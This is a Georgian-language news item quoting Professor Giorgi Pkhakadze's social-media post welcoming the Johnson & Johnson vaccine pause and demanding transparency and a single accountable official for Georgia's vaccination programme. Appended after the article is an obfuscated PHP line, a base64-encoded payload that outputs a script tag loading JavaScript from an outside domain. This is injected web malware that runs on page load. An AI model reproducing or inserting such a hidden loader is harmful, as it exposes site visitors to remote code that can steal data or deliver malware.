celsiusi
ავერსი შნაიდერი
გაეროს გენერალური მდივნის მრჩეველი, პროფესორ გიორგი ფხაკაძე აცხადებს, რომ ოფიციალირად დასეხელდეს ერთი პირი ვინც იქნება პასუხისმგებელი ვაქცინაციის პროცესზე. ამის შესახებ  ფხაკაცე სოცოალურ ქსელში წერს. 
 
“აშშ და ევროპაში Johnson & Johnson-ის ვაქცინით აცრებს დროებით აჩერებს...
ეს არის პასუხისმგებლიანი კომპანიის და ძლიერი მარეგულირებლის სწორი გადაწყვეტილება;  
 
Covid-19  ყველა ახალი ვაქცინა უნდა იმართებოდეს ისე, როგორც ნებისმიერი კლინიკური კვლევების დროს, შესაბამისი კლინიკური პროტოკოლებით; 
 
სად არის ელექტრონული ჯანდაცვა?
სად არის გამჭირვალე გადაწყვეტილების პროცესი?
სად არის ანგარიშვალდებულება?
დავიღალე ერთი და იმავეზე საუბრით ეს ბოლო 16 თვე...
 
ვამბობ, არ მიჯერებთ, მერე მლანძღავთ, მერე ბოტებს მისევთ და შეკვეთილ სტატიებს აწერინებთ, მერე ხდება ზუსტად ის, რაზეც გაფრთხილებდით და მერე ... სიტყვა სიტყვით იმეორებთ, რასაც მე ვამბობდი.... არ დაიღალეთ? 
 
ჩემს და საზოგადოების კითხვებზე პასუხი გაცემული დღემდე არ არის: 
 
რატომ არ არის გასაჯაროებული იმ 82 ექსპერტის სახელი, გვარი და თანამდებობა, ვინც  “ვაქცინაციის გეგმა” დაწერა?
სად არის პარლამეტის მიერ მიღებული კანონის მოსახლეობისათვის განმარტება,  ვაქცინაციის შედეგად წარმოქმნილი გართულებების ან ლეტალური შედეგის დადგომის შემთხვევაში რა პასუხისმგებლობას იღებს სახელმწიფო?
ოფიციალურად დასახელედეს 1 (ერთი) პირი, თუ ვინ არის პასუხისმგებელი ქვეყანაში ვაქცინაციის პროცესზე!
 
გასაჯაროვდეს ძლიერი მარეგულირებლების ჩამონათვალი და იყოს მკაფიოდ დასაბუთებული, თუ რატომ მიიჩნევა ესა თუ ის მარეგულირებელი საქართველოსთვის ძლიერად;
 
მე ვერ გამაჩერებთ, სიმართლეს ვერ გააჩერებთ, სიცოცხლეს ვერ გააჩერებთ, წინსვლას ვერ გააჩერებთ, მე სულ ვიტყვი სიმართლეს, იმას, რასაც სხვა ვერ ან არ ამბობს”, - აცხადებს გიორგი ფხაკაძე
 
 
 
4926
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");